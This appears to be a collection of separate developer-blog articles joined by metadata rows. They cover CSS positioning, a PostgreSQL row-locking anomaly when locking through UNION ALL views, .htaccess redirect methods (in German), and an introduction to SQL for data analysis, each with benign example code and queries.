[Relative position](https://developer.mozilla.org/en-US/docs/Web/CSS/position#:~:text=A%2520relatively%2520positioned%2520element%2520is,properties%2520specify%2520the%2520horizontal%2520offset.) is an element relative to its normal position on the page. However, the setting of a relatively-positioned element's `top`, `right`, `bottom`, and `left` properties affect its normal page position. However, any space left by the relative element will not allow any content to adjust to fit. This is because the gap bounds them in the document. Therefore, when the element with a relative position moves, no part of anything else is influenced on the screen. Still, it is as if the element kept its position on the screen and everything else flows around it as if it had never moved.
Note that changing the position property does nothing. It only starts doing something when you use one of the coordinating properties. Therefore, you set the movement values using `top`, `bottom`, `left`, and `right` to cancel the box close to the current position of the element you are moving. It's essential to note that the movement of the components works opposite of the order given and not the direction of the movement set. For example:
- Set the positive value for the `left` property to move an element to the right.
- Set the positive value for the `right` property to move an element to the left.
- Set the positive value for the `bottom` property to move an element up.
- Set the positive value for the `top` property to move an element down.
We’ll be centering the parent element in order to explain relative positioning. With this, it’s easier to understand the movement of what we will be doing:
```
<!DOCTYPE html>
<html>
<head>
<style>
.parent {
background-color: #73AD21;
border: solid 3px blue;
display: flex;
align-items: center;
justify-content: center;
height: 500px;
}
.box1 {
width: 200px;
height: 100px;
background-color: white;
}
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
}
.box3 {
width: 200px;
height: 100px;
background-color: red;
}
</style>
</head>
<body>
<div class="parent">
<div class="box1"></div>
<div class="box2"></div>
<div class="box3"></div>
</div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=0e5d47ac0b)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image12_c720d43eca90a247c1df32b730937796.png" alt="White, yellow, and red rectangles in the center of a larger green rectangle."/></figure>
Now, let’s add the position property CSS relative to our code to move the box around:
```
<!DOCTYPE html>
<html>
<head>
<style>
.parent {
background-color: #73AD21;
border: solid 3px blue;
display: flex;
align-items: center;
justify-content: center;
height: 500px;
}
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: relative;
}
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: relative;
}
.box3 {
width: 200px;
height: 100px;
background-color: red;
position: relative;
}
</style>
</head>
<body>
<div class="parent">
<div class="box1"></div>
<div class="box2"></div>
<div class="box3"></div>
</div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=6e784f8759)
Here is the outcome:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image9_215669f96df219354d9fc04ce7e44456.png" alt="White, yellow, and red rectangles in the middle of a larger green rectangle."/></figure>
Observe that nothing changes. This is because the position property relative does nothing to the elements. You can effect change by adding any coordinating properties: left, right, top and bottom.
Next, let's move the element (`box1`) to the left and bottom:
```
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: relative;
right: 250px;
top: 90px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=295345984b)
Let's look at the result to better understand how to set the value of the properties:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image13_830fbba71d13e9fbe69f0b6fb248d0f7.png" alt="A white rectangle in the lower left corner and yellow and red rectangles in the middle of a larger green rectangle."/></figure>
Notice that to move the element to the left, you need to set the value to the right; to move it to the bottom, you set it to the top. Also, it is as if the element kept its position on the screen.
Now, let’s move the element (`box2`) to the right and top:
```
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: relative;
left: 100px;
bottom: 70px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=21cb459ba7)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image3_6e2d3b4cb762604d73b6050d92a6a96f.png" alt="Three rectangles in the middle of a larger green rectangle. Two of the rectangles overlap."/></figure>
Remember that the value was set to left to enable the element to move right; to move it to the top, you set it to the bottom. In addition, the movement of the element did not push down or influence the other elements on the screen.
### Absolute Position
[Absolute position](https://developer.mozilla.org/en-US/docs/Web/CSS/position#:~:text=An%2520absolutely%2520positioned%2520element%2520is,which%2520the%2520element%2520is%2520positioned.)) is an element with its position relative to its parent element. In this case, you remove the element from the normal document flow and do not create any gap for it in the page layout. Instead, the `left`, `top`, `bottom` and `right` values determine the element's final position.
Note that an absolute positioned element uses the document body and moves along with page scrolling. In addition, if it has no positioned ancestors, it can overlap.
For better understanding, we’ll work with these elements to explain how absolute positioning works:
```
<!DOCTYPE html>
<html>
<head>
<style>
body{
background-color: #73AD21;
}
.container {
background-color: red;
border: solid 3px blue;
display: flex;
align-items: center;
justify-content: center;
width: 500px;
height: 400px;
position: relative;
}
.box1 {
width: 200px;
height: 100px;
background-color: white;
}
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
}
</style>
</head>
<body>
<div class="container">
<div class="box1"></div>
<div class="box2"></div>
</div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=d98f48bcad)
Here is the outcome:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image2_944cb9e5c4effdd38c508128c838be79.png" alt="A red square inside a green rectangle. White and yellow rectangles in the middle of the red square."/></figure>
Now, we’ll move the box. As mentioned earlier, that absolute position is an element with its position relative to its parent element.
Let’s move `box1` to the left 50px from the parent element and down 40px from the parent element:
```
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: absolute;
left: 50px;
top: 40px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=bd784dab70)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image5_d099265ddb211095c803d0d8b53f6dcb.png" alt="White and yellow rectangles in the upper left corner of a red square in a green rectangle."/></figure>
Notice that the element was taken out of the document's normal flow, unlike the relative positioning, which leaves a space for a ghost element.
Next, let’s move the `box1` element to the left of 50px and the top margin of 0 relative to its parent element:
```
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: absolute;
left: 50px;
top: 0;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=50ee41a237)
Here is the outcome:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image14_13adc1871909c9407051417329aa4511.png" alt="White and yellow rectangles in a red square in a green rectangle."/></figure>
The above image shows how `box1` is positioned relative to its parent element.
Now, let’s move the `box2` element to the right 50px from the parent element, and down 40px from the parent element:
```
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: absolute;
right: 50px;
bottom: 40px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=3905459324)
Here is the effect of the code:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image1_606b7319294f035c5e74c600c2d0fd2c.png" alt="White and yellow rectangles in the lower right corner of a red square inside a green rectangle."/></figure>
Notice that the element affects the flow on the page. Also, the coordinating properties work as rendered, unlike relative positioning, where you have to set `right` to move left.
Next, let’s move the `box2` element to the right 50px and to the bottom margin of 0 relative to its parent element:
```
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: absolute;
right: 50px;
bottom: 0;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=8297449705)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image8_7672ee93047287793f7e822601999029.png" alt="White and yellow rectangles in a red square in a green rectangle."/></figure>
This shows that `box2` element is positioned relative to its parent element, which has a bottom margin of 0.
### Fixed Position
An element with [a fixed position](https://www.w3.org/wiki/CSS_absolute_and_fixed_positioning?source=post_page#:~:text=Fixed%2520positioning%2520is%2520really%2520just,position%2520inside%2520the%2520browser%2520window.) is similar to an absolute element. This position is relative to the viewport, showing that it always remains in the same position even when you scroll through the page. When you see a fixed element on a page, it does not leave a gap. For example, the properties `top`, `right`, `left`, and `bottom` work as position elements. Note that fixed elements are not affected by scrolling; instead, they are in the same position on the screen.
We’ll use this image to explain the fixed position, white element and yellow element before we scroll down:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image10_d8bdc65195f7b16ab0f023798d1f8bc1.png" alt="White and yellow squares on top of red text."/></figure>
Now, let’s use two box elements to explain the fixed position. To do this, we’ll set the `box1` (white) element as the absolute position and the `box2` (yellow) element as the fixed position:
```
<style>
body{
background-color: #73AD21;
}
.container {
background-color: red;
border: solid 3px blue;
display: flex;
overflow: scroll;
align-items: center;
justify-content: center;
width: 500px;
height: 400px;
position: relative;
}
.box1 {
width: 100px;
height: 100px;
background-color: white;
position: absolute;
left: 50px;
}
.box2 {
width: 100px;
height: 100px;
background-color: yellow;
position: fixed;
}
</style>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=464a4f8dc0)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image7_c21d580cf1dec47521cb4ef2884fc30b.png" alt="White and yellow squares on top of red text."/></figure>
Notice that the `box2` (yellow) element was not affected by the scrolling, rather, it remains fixed in the same position on the screen.
### Sticky Position
[A sticky position](https://blog.hubspot.com/website/css-position-sticky) occurs when an element is positioned based on the user's scroll position. The sticky position combines the relative and fixed positions, depending on the part of the scroll. In this way, it acts like a relatively positioned element. In addition, it maintains a relative position until a given offset position is met in the viewport, and then it "sticks" in place like a fixed position.
Let’s look at this example for a better understanding of how the sticky position works:
```
<style>
.container {
background-color: grey;
border: solid 3px blue;
width: 600px;
height: 400px;
overflow: scroll;
}
.sticky {
background-color: white;
width: 100px;
height: 100px;
position: sticky;
top:0;
}
</style>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=af3c48b4dc)
Below are the results of the element before and after we scroll.
The image before the scrolling:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image6_83218c1e92a976b9367436571dec9c79.png" alt="A white square between two paragraphs."/></figure>
The image after scrolling:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image4_08ce271e0d5934e9215c5f9ed769d42b.png" alt="The white square is now in the upper left corner of the rectangle."/></figure>
Notice that the white element maintained a relative position until it met the specified top scroll position of `top:0`. Then, it acts as a fixed position element and sticks to the specified spot.
## Conclusion
The CSS positioning properties give structure to your designs and make reviewing the content on a web page more accessible. So, be intentional with CSS positioning, and the results will blow your mind! However, mastering CSS takes regular practice. Keep honing your skills, and you’ll get better at it in time. Learn more about CSS positioning properties such as [CSS float and clear](https://code.pieces.app/blog/fundamentals-of-the-css-float-and-clear-properties), or [how to style text in CSS](https://code.pieces.app/blog/styling-text-in-css) on your site. | get_pieces |
1,344,275 | PostgreSQL: ⚠ when locking though views (TL;DR: test for race conditions and check execution plan with BUFFERS, VERBOSE) | In theory, in a relational database, you should be able to interact (any DML) with all tables through... | 0 | 2023-02-02T17:44:35 | https://dev.to/aws-heroes/postgresql-when-locking-though-views-tldr-test-for-race-conditions-and-check-execution-plan-with-buffers-verbose-28je | postgres, sql, lock, view | In theory, in a relational database, you should be able to **interact (any DML) with all tables through a view**. But there may be some implementation details, limitations, or bugs changing the behavior. This means that, if you are doing some thicky things through a view, you should **test them carefully**. However, be careful that unit tests are not sufficient. You must validate the **concurrent session conflicts behavior**: isolation levels and implicit and explicit locking.
I'm taking an example that can be reproduced in the latest PostgreSQL. I've also tested on Amazon Aurora with PostgreSQL 14.6 compatibility, this is where I've taken the output for this blog post.
## Connect from `psql`
I connect to it with all connection information in environment variables:
```
$ PGHOST=pg.cluster-...eu-west-1.rds.amazonaws.com psql
psql (14.5, server 14.6)
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=> select inet_server_addr();
inet_server_addr
------------------
172.31.42.200
(1 row)
postgres=> \! psql -c "select inet_server_addr()"
inet_server_addr
------------------
172.31.42.200
(1 row)
```
The point of the above connection test is to verify that I can connect two sessions on the same database though `\! psql` as the environment variables are propagated to the child process.
## Create small tables for the test
I create a demo table and a VIEW on it with a UNION ALL:
```sql
create table demo_table
as select generate_series(1,3) as id , 0 as value;
vacuum analyze demo_table;
CREATE OR REPLACE VIEW demo_view AS
select id,value from demo_table where mod(id,2)=0
union all
select id,value from demo_table where mod(id,2)=1
;
```
## Simple test case with two sessions
I'll run a transaction with two SELECT FOR UPDATE on the demo table but through the VIEW. This is implicit locking when we want to read the latest state (rather than an MVCC snapshot). It blocks any concurrent changes on those rows so to guarantee that the state that was read is still the latest.
While the transaction is still ongoing, I start another session (calling `psql` with `\!` - my connection credentials are all in the environment) to run an update of those rows. This is a very simple way to test with two sessions. I expect that it waits for the completion of the ongoing transaction (pessimistic locking):
```sql
begin transaction;
select * from demo_view for update;
\! psql -ec "UPDATE demo_table SET value = 1"
select * from demo_view for update;
rollback;
```
However, here is the result:
```
postgres=# select version();
version
-----------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 13.7 on aarch64-unknown-linux-gnu, compiled by aarch64-unknown-linux-gnu-gcc (GCC) 7.4.0, 64-bit
(1 row)
postgres=# begin transaction;
BEGIN
postgres=*# select * from demo_view for update;
id | value
----+-------
2 | 0
1 | 0
3 | 0
(3 rows)
postgres=*# \! psql -ec "UPDATE demo_table SET value = 1"
Pager usage is off.
UPDATE demo_table SET value = 1
UPDATE 3
postgres=*#
postgres=*# select * from demo_view for update;
id | value
----+-------
2 | 1
1 | 1
3 | 1
(3 rows)
postgres=*# rollback;
ROLLBACK
```
The UPDATE didn't wait and the two SELECT FOR UPDATE. The two SELECT in the same transaction do not show the same state. Obviously, this is a bug. I filed [BUG #17770](https://www.postgresql.org/message-id/17770-f9e90c19d082a231%40postgresql.org).
## Execution plan
The goal of this blog post is to raise some awareness on what can happen, and can be missed if race conditions are not tested. The bug can be reported to the PostgreSQL mailing list, or the managed service support in the case of Aurora.
As mentioned, the best is to test all expected race condition. Another way is to look at the execution plan, which exposes some of the implementation details, as it may give a clue about what can go wrong:
```
postgres=# explain (verbose, analyze, buffers)
select * from demo_view for update;
QUERY PLAN
------------------------------------------------------------------------------------------------------------------------------------------
LockRows (cost=0.00..2.14 rows=2 width=40) (actual time=0.011..0.018 rows=3 loops=1)
Output: "*SELECT* 1".id, "*SELECT* 1".value, (ROW("*SELECT* 1".id, "*SELECT* 1".value))
Buffers: shared hit=2
-> Append (cost=0.00..2.12 rows=2 width=40) (actual time=0.011..0.016 rows=3 loops=1)
Buffers: shared hit=2
-> Subquery Scan on "*SELECT* 1" (cost=0.00..1.05 rows=1 width=40) (actual time=0.011..0.012 rows=1 loops=1)
Output: "*SELECT* 1".id, "*SELECT* 1".value, ROW("*SELECT* 1".id, "*SELECT* 1".value)
Buffers: shared hit=1
-> Seq Scan on public.demo_table (cost=0.00..1.04 rows=1 width=8) (actual time=0.008..0.009 rows=1 loops=1)
Output: demo_table.id, demo_table.value
Filter: (mod(demo_table.id, 2) = 0)
Rows Removed by Filter: 2
Buffers: shared hit=1
-> Subquery Scan on "*SELECT* 2" (cost=0.00..1.05 rows=1 width=40) (actual time=0.002..0.003 rows=2 loops=1)
Output: "*SELECT* 2".id, "*SELECT* 2".value, ROW("*SELECT* 2".id, "*SELECT* 2".value)
Buffers: shared hit=1
-> Seq Scan on public.demo_table demo_table_1 (cost=0.00..1.04 rows=1 width=8) (actual time=0.001..0.002 rows=2 loops=1)
Output: demo_table_1.id, demo_table_1.value
Filter: (mod(demo_table_1.id, 2) = 1)
Rows Removed by Filter: 1
Buffers: shared hit=1
Query Identifier: -1810003173879754115
Planning Time: 0.083 ms
Execution Time: 0.050 ms
(24 rows)
```
I displayed BUFFERS which shows that the `LockRows` is actually touching some data. I also displayed VERBOSE which shows which columns are available in the rowset operation: `"*SELECT* 1".id, "*SELECT* 1".value, (ROW("*SELECT* 1".id, "*SELECT* 1".value))`. This looks like a temporary table from the result. How can the `LockRows` find which rows to lock without a `ctid`?
An execution plan when doing the same on the table rather than the view shows `id, value, ctid`:
```
QUERY PLAN
------------------------------------------------------------------------------------------------------------------
LockRows (cost=0.00..1.06 rows=3 width=14) (actual time=0.055..0.063 rows=3 loops=1)
Output: id, value, ctid
Buffers: shared hit=4
-> Seq Scan on public.demo_table (cost=0.00..1.03 rows=3 width=14) (actual time=0.007..0.008 rows=3 loops=1)
Output: id, value, ctid
Buffers: shared hit=1
Query Identifier: -5183708313868986861
Planning:
Buffers: shared hit=3
Planning Time: 0.071 ms
Execution Time: 0.083 ms
(11 rows)
```
I'm convinced that, in addition to tests covering the expected race conditions, the execution plan should be verified for non-trivial queries. You need to trust the query execution before releasing it into production because those kind of anomalies will be rare, the wrong result being not immediately visible, and the troubleshooting very difficult. It is also good to think about how it could work. The FOR UPDATE applies to the table, not the result, and a UNION ALL can come from many tables.
I got the heads up on this case from a colleague checking for an optimization suggested by a user. He did the right thing: checking lock behavior. As he is implementing the locking mechanisms in YugabyteDB, you can see the high quality of engineering. The PostgreSQL compatibility of YugabyteDB, like Amazon Aurora, inherits the same behavior, so be careful and avoid to SELECT FOR UPDATE on UNION ALL views.
| franckpachot |
1,366,949 | Redirect einer Webseite - Mittel und Wege zum Thema | Redirect einer Webseite; Bei Redirect handelt es sich um eine server-seitige beziehungsweise um eine... | 0 | 2023-02-15T17:25:45 | https://dev.to/digital_hub/redirect-einer-webseite-mittel-und-wege-zum-thema-4o8m | apache, php, linux |
Redirect einer Webseite;
Bei Redirect handelt es sich um eine server-seitige beziehungsweise um eine client-seitige Weiterleitung - wo eine 'URL gewissermaßen
auf eine andere geleitet wird.
man kann auch sagen dass eine URL auf eine andere URL zeigt. Was passiert hier wirklich - wie geht dies technisch?
Diese hier in Frage stehende Weiterleitungen einer URL auf eine andere - diese können Webmaster mit verschiedenen Verfahren und Möglichkeiten umsetzen:
[b]1. mit Hilfe der htaccess-Datei: [/b]
Dieses Verfahren - das mittels einer .htaccess einzustellen - ermoeglicht so genannte Redirects über die htaccess
Das geschieht relativ "lautlos und gewissermaßen - unbemerkt für die User.
darüber hinaus gibt es noch weitere Möglichkeiten:
[b]2. ein Redirect mittels Status-Codes 3xx[/b]
bei diesem Verfahren geht man einen anderen Weg: hier geht es so, dass der Server einen so genannten 3xx-Statuscode herausgibt
Dabei handelt es sich immer um eine Form der Weiterleitung bei der eine Domain auf eine andee Domain zeigt.
Das bedeutet dass eine URL auf eine weiter URL weitergeleitet wird.
Grundsätzlich kann man festhalten, dass es mehrfache Verfahren. Welche Variante der Weiterleitung verwendet wird, hängt vom jeweiligen Ziel und
Zweck ab - m.a.W., davon was man bei dem Weiterleiten will.
die [b]301-Redirect[/b] Methode:
das ist eine Methode die man anwenden kann; Also wenn man eine URL oder eine Domain nach der sogenannten Methode 301 weiterleiten will.
Das ist ein sehr beliebtes Verfahren.
bei der 301-Redirect Methode da handelt es sich gewissermaßen praktisch um eine permanente Umleitemethode.
Dabei gibt sozusagen der Server einen temporären Statushinweise aus - den sogenannten „moved permanently“ - Dies ist ganz typisch für diese Redirect-Methode.
Sie ist überaus beliebt und wird oft eingesetzt: die Methode der Umleitung kann in ganz vielen use-cases eingesetzt werden:
wenn man
a. von einer Domain auf eine andere weiterleiten will - zum Beispiel bei einem Domain-Umzug.
b. von einem Folder auf ein anderen weiterleiten will - etwa bei einer Umstrukturierung auf der Homepage: Das Verfahren ist auch sehr oft gefragt:
c. einer weiterleitung oder Redirekt - die im Zuge eines protokoll-wechsels erfolgt: also etwa bei Web-Protokoll a NACH Webprotokoll b.
also etwa zum Beispiel von http auf https. Das kommt auch ziemlich oft vor und diese Methode ist sehr beliebt.
Was man noch beachten muss: wenn man einen redirect erstellen möchte, dann muss man darauf achten, dass man an den Eintrag in der htaccess denkt.
Bei diesem Eintrag handelt es sich um eine Datei, die direkt auf einem Apache-Server im Rootverzeichnis gespeichert wird.
Die htaccess-Textdatei ist übersichtlich aufgebaut und sie lässt sich im Grunde mit einem herkömmlichen Text-Editor herstellen, editieren oder auch bearbeiten.
Kommmen wir zu den Vor- und Nachteilen;
Einer der großen Vorteile eines 301-Redirects kann man darin sehen, dass die Weiterleitung nahezu unauffällig und sagen wir "geräuschfrei" von Statten geht. Der user merkt gar nicht viel davon. Das ist sehr hilfreich.
Da allerdings jede Weiterleitung bei jedem Server-Abruf über die htaccess geladen wird, sollten Webmaster die Zahl der permanenten Umleitungen begrenzt halten, um die Ladezeit einer Webseite nicht unnötig zu erhöhen.
zu den bestimmenden oder konstitutiven Teilen der .HTACCESS-Datei;
Wenn man die Weiterleitung einleiten vwill dann ists wichtig dass das mod_rewrite-Modul des Servers aktiviert ist.
Danach also an der nächsten Stelle, da wir dann weiteres angegegeben wird:
Jetzt kommt es darauf an dass festgehalten, auf welcher Domain-Basis der Redirect erfolgt.
Danach - also an nächster Stelle wird die Art der Weiterleitungen spezifiziert.
Hierfür werden diverse Methoden bereitgehalten - sie helfen die Art und Weise näher zu bestimmen:
Dies gilt für alle Fälle und Arten des 3xx-Redirects.
hier eine kleine Zusammenstellung der htaccess-Datei - sie kann etwa wie folgt aussehen:
RewriteEngine On
RewriteBase /
RewriteRule seite1.html seite2.html [R=301]
Wir sehen dass die Verfahren sehr vielfältig sind: In all den Fällen wird gewissermaßen die Seite A bei einem Server-Abruf dauerhaft auf
eine weitere Seite B weitergeleitet bzw. umgeleitet. Das Verfahren ist sehr sehr beliebt.
[b]302-Redirect[/b]
Der 302-Redirect (das auch „Moved Temporarily“ genannt wird) - dieses Verfahren kann eine URL sehr bequem umleiten.
Das funktioniert so, dass die Besucher der Seite beim Browser-Abruf direkt auf die neue URL weitergeleitet.
Das ist ein sehr beliebtes Verfahren - und wird sehr oft bei Redirects eingesetzt.
Es hat sehr nützliche und beliebte Vorteile: Sieht man auf die 301-Redirect Verfahren und vergleicht es damit - dann kann man sagen dass der 302 nur für zeitlich begrenztes Redirecting eingesetzt wird. Das sind also sehr begrenzte Use-Cases: Etwa kann das zum Beispiel sein, wenn eine URL nur temporär geschaltet wird.
betrachten wir zum Ende noch ein weiteres Verfahren - das sogenannte 307er Umleitungsverfahren:
[b]307-Redirect[/b]
Die sogenannte Weiterleitung nach der Methode 307-Redirect
Für Server-Wartungen bietet sich das Weiterleiten per 307-Redirect an. Ebenso kann diese Form des URL-Umleitens für Geotargetings genutzt werden, um User nach dem Abruf der IP-Adresse auf die korrekte Länderversion weiterzuleiten.
| digital_hub |
1,367,432 | SQL101: Introduction to SQL for Data Analysis | Introduction SQL (Structured Query language) is an essentially powerful tool for Data Analysts. It is... | 0 | 2023-02-18T06:33:24 | https://dev.to/njenga98/sql101-introduction-to-sql-for-data-analysis-4lh5 | sql, datascience, database, datanewbie | **Introduction**
SQL (Structured Query language) is an essentially powerful tool for Data Analysts. It is very helpful in instances where one is working with data held in relational databases.
SQL is useful in accessing and manipulating data allowing Data Analysts to extract valuable insights and make informed resolutions. Techniques in SQL for data analysis include; retrieving data, filtering data, joining tables, aggregating data, and creating tables.
**Data Analysis**
Data analysis is an undertaking that involves inspection, cleaning, transforming, and modeling data to obtain useful insights for effective decision-making. Various techniques and methods are employed to identify patterns, trends, and relationships in the data.
**Relational databases**
This is a type of database that stores and sorts data in a collection of related tables. It consists of one or more tables, each with a unique name, and each table consists of columns and rows.
**What is SQL? **
Pronounced as "Sequel", is a special-purpose programming language that is used to manage and manipulate data in relational databases.
**History of SQL**
SQL was first developed in the early 1970s by Raymond F. Boyce and Donald D. Chamberlin, who were IBM researchers. They had been working on a project referred to as System R, which was an illustration of a relational database management system (RDBMS). the goal was to build a new type of database that would be more user-friendly and flexible than existing databases.
SQL was created with the user in mind, allowing both technical and non-technical users to interact with relational databases. It was based on the principles of relational algebra and set theory, and was created to be a declarative language, which means users were required to specify what they wanted the database to do rather than how to do it.
In the 1980s, SQL was adopted as the language for accessing and manipulating data in relational databases. In 1986, the first official SQL standard was published by ANSI (American National Standards Institute) and later adopted as an international standard by ISO (International Organization for Standardization).
**Why SQL for data analysis and no other technologies**
SQL has grown in its popularity as an effective data analysis tool for various reasons. These are;
1. Flexibility – SQL offers a high rate of flexibility in data analysis. It is used to extract data, filter data aggregate data, and join data from multiple tables.
2. Efficient querying – SQL allows for efficient querying of large datasets enabling analysts to extract relevant data needed for analysis quickly.
3. Reproducibility – SQL scripts can be saved and reused making it easier to reproduce analyses and ensure that the results are consistent over time.
4. Standardization – SQL is a standardized language used by many different database management systems
5. Scalability – SQL is suitable to work with large datasets which are increasingly vital as the data volume being generated keeps growing.
6. Data manipulation – SQL allows for data manipulation such as adding, updating, or deleting data in a database. This offers an efficient way to clean and prepare data for analysis.
7. Accessibility – SQL tools are easily available for free to any user.
**Components of SQL**
SQL (Structured Query Language) is a domain-specific programming language used for managing and manipulating relational databases. It is comprised of several components, including:
1. Data Definition Language (DDL): DDL is used to define and manage the structure of the database, including tables, views, indexes, and other database objects. Common DDL statements include CREATE, ALTER, and DROP.
2. Data Manipulation Language (DML): DML is used to manipulate data within the database, including inserting, updating, and deleting records. Common DML statements include INSERT, UPDATE, and DELETE.
3. Data Query Language (DQL): DQL is used to query the database and retrieve data from one or more tables. The most common DQL statement is SELECT.
4. Transaction Control Language (TCL): TCL is used to manage transactions within the database. Common TCL statements include COMMIT, ROLLBACK, and SAVEPOINT.
5. Data Control Language (DCL): DCL is used to control access to the database and its objects. Common DCL statements include GRANT, REVOKE, and DENY.
6. Data Administration Language (DAL): DAL is used to manage the security, backup, and recovery of the database. Common DAL statements include BACKUP, RESTORE, and CREATE USER.
Each of these components plays a critical role in managing and manipulating data within a relational database. By leveraging these components, developers, data scientists, and analysts can work with data in a structured, efficient, and secure manner.
**SQL Techniques used in Data Analysis**
Understanding how SQL components work is an essential skill for any Data Analyst as well as Data scientist. To effectively analyze data in SQL, a variety of techniques are used. These are;
1. **SELECT STATEMENTS**
This is the most basic SQL command that is used to retrieve data from a database. Users can specify which columns of data they want to receive and the table to retrieve from. Below is a code snippet of how the SELECT statement is used;
-- Select all columns from a table
SELECT * FROM customers;
-- Select specific columns from a table
SELECT customer_id, customer_name, email FROM customers;
-- Select a calculated column
SELECT order_id, order_date, total_amount, total_amount * 0.2 AS tax_amount FROM orders;
2. **Aggregation**
SQL gives several functions that are used to summarize data such as COUNT, SUM, AVG, MAX, and MIN. These functions are used to group and analyze data based on the different conditions as per the below;
-- Count the number of rows in a table
SELECT COUNT(*) FROM orders;
-- Calculate the average order amount
SELECT AVG(total_amount) FROM orders;
-- Group orders by customer and calculate the total order amount for each customer
SELECT customer_id, SUM(total_amount) FROM orders GROUP BY customer_id;
3. **Joins**
These are used to combine data from two or more tables based on identical columns or keys.
There are several types of joins, these are INNER JOIN, LEFT JOIN, RIGHT JOIN, and FULL OUTER JOIN.
An example of how to use joins during analysis is;
-- Inner join two tables
SELECT orders.order_id, customers.customer_name
FROM orders
INNER JOIN customers ON orders.customer_id = customers.customer_id;
-- Left join two tables
SELECT customers.customer_name, orders.total_amount
FROM customers
LEFT JOIN orders ON customers.customer_id = orders.customer_id;
-- Full outer join two tables
SELECT *
FROM customers
FULL OUTER JOIN orders ON customers.customer_id = orders.customer_id;
4. **Subqueries**
This is a query within a query in a database. It allows a user to extract data from a table based on conditions from another table. For example;
-- Select all customers with orders in the past month
SELECT customer_name
FROM customers
WHERE customer_id IN (
SELECT customer_id
FROM orders
WHERE order_date > DATEADD(month, -1, GETDATE())
);
-- Select all orders with a total amount greater than the average order amount
SELECT order_id, total_amount
FROM orders
WHERE total_amount > (
SELECT AVG(total_amount)
FROM orders
);
5. **Conditional Statements**
SQL offers many conditional statements that perform conditional calculations or manipulation of data. These conditions are IF, CASE, and COALESCE. For example;
-- Create a new column that indicates whether an order is a large order or a small order
SELECT order_id, total_amount,
CASE
WHEN total_amount > 1000 THEN 'Large Order'
ELSE 'Small Order'
END AS order_size
FROM orders;
-- Replace null values in a column with a default value
SELECT order_id, COALESCE(order_notes, 'No notes') AS order_notes
FROM orders;
6. **Data cleansing**
SQL is used to clean and manipulate data using techniques such as trimming, filtering, and replacing data. For example;
-- Remove leading and trailing spaces from a column
SELECT TRIM(customer_name) FROM customers;
-- Filter out orders with a total amount of less than 10
SELECT * FROM orders WHERE total_amount >= 10;
-- Replace null values in a column with a specific value
SELECT order_id, REPLACE(ISNULL(order_notes, ''), 'N/A', 'No notes available') AS order_notes
FROM orders;
These are just a few techniques that an analyst can use to effectively analyze data to derive. useful insights from it.
**Models Used in SQL for Data Analysis**
To effectively derive insights from data, SQL models are used to structure data for efficient querying and perform calculations and aggregations. These models are;
• Relational Model: The relational model is the foundation of SQL, and it represents data as a set of tables with rows and columns. The tables are related to each other by key fields, and SQL can be used to join tables, filter data, and perform aggregations.
• Dimensional Model: The dimensional model is a specialized data model used in data warehousing. It represents data as facts and dimensions, with facts representing the measurable data (such as sales or revenue) and dimensions representing the categories or attributes that define the facts (such as time or product). SQL can be used to build and query dimensional models.
• OLAP (Online Analytical Processing) Model: The OLAP model is a data model used for multidimensional analysis, such as pivot tables or data cubes. It represents data as dimensions and measures, and SQL can be used to build and query OLAP models.
• Regression Model: Regression is a statistical model used to identify the relationship between one or more independent variables and a dependent variable. SQL can be used to build regression models, which can help to predict future outcomes based on historical data.
• Time Series Model: Time series analysis is a statistical technique used to analyze data that varies over time. SQL can be used to build time series models, which can help to identify patterns and trends in time-based data.
